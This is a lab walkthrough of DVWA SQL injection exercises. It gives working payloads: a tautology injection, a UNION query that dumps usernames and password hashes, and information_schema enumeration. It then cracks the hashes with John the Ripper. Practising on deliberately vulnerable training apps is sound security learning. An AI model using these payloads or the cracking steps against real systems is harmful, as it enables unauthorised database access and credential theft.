DVWA Exercises 5
09 SQL Injection

Here we can see an input field where we can put in a number. The sql statement in the background could look like this:
select firstname,surname from users where uid='$_GET['id']';
Let's try to inject a SQL statement:
1' or '1' = '1

10 SQL Injection with union
With SQL Union we can grab information from other tables.
The UNION
keyword lets you execute one or more additional SELECT
queries and append the results to the original query. For example:
SELECT a, b FROM table1 UNION SELECT c, d FROM table2
This SQL query will return a single result set with two columns, containing values from columns a
and b
in table1
and columns c
and d
in table2
.
For a UNION
query to work, two key requirements must be met:
The individual queries must return the same number of columns.
The data types in each column must be compatible between the individual queries.
Let's try the following SQL Query:
%' or '0'='0' union select user,password from users #

11 Further Database Enumeration
Most database types (with the notable exception of Oracle) have a set of views called the information schema which provide information about the database.
You can query information_schema.tables
to list the tables in the database:
SELECT * FROM information_schema.tables
You can then query information_schema.columns
to list the columns in individual tables:
SELECT * FROM information_schema.columns WHERE table_name = 'Users'
Let's try the following SQL Query:
%' or '0'='0' union select TABLE_NAME,COLUMN_NAME from information_schema.COLUMNS #

12 Crack the password hashes
I put the collected password hashes in a file and try to crack the passwords with John the ripper.
First let's check which hash type we have with a tool called hash-identifier:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=RAW-MD5 hashes.txt

Last updated
Was this helpful?